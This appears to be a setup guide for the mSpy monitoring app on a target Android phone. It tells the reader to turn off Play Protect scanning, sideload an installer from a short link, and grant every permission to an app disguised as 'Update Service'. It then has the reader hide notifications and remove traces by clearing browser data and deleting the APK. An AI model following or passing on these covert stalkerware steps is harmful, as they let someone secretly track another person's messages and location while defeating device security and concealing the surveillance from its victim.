Disable PlayProtect on the device you want to monitor
1. Go to 'Play Store'.
2. Tap 'Menu button' (three lines in the top left corner).
3. Find and tap 'Play Protect'.
4. 'Settings (cogwheel)'.
5. Disable 'Scan device for security threats'.
6. Go to 'Settings' ⭢ 'Apps' ⭢ 'Google Play Store' ⭢ 'Notifications' ⭢ disable 'Show notifications'.
Download mSpy installer
1. 'Open a browser' (Chrome).
2. Tap on the address bar.
3. Enter the link 'b55y.net/a' and press 'Go'.
4. Draw the shape, once successful click 'Download' → 'Ok'.
5. Hit 'Open' ⭢ 'Settings' ⭢ 'Allow from this source'.
6. Go back ⭢ hit 'Install' ⭢ 'Open'.
1. Tap 'Allow' for all permissions.
2. Tap 'Ok' → enable 'Framework update service'.
3. Tap 'Ok' → 'Update Service' → enable 'Allow usage tracking'
4. Tap 'Ok' → 'Don't show again' → 'Start now'. Tap 'Ok' ⭢ disable 'Show notifications'.
5. Tap 'Ok'. Tap 'Not allowed' → 'All'. Find and tap 'Update Service' → 'Don't allow'.
6. Click on the area above 'Complete installation' and enter the registration code.
7. Press 'Complete installation'.
8. Go to 'Settings' ⭢ 'Apps' ⭢ 'Update service' ⭢ 'Data usage' ⭢ enable 'Unrestricted data usage'
1. Go to 'Chrome' → tap on three dots → 'Settings'.
2. Go to 'Privacy' → 'Clear browsing data' → 'Clear data'.
3. Go to the home screen and find the 'File Manager'.
4. Go to 'APKs' → delete 'bt.apk'.
Turn on Location
Touch the screen in two places and pull down the extended menu from the top of the screen → 'Enable Location'.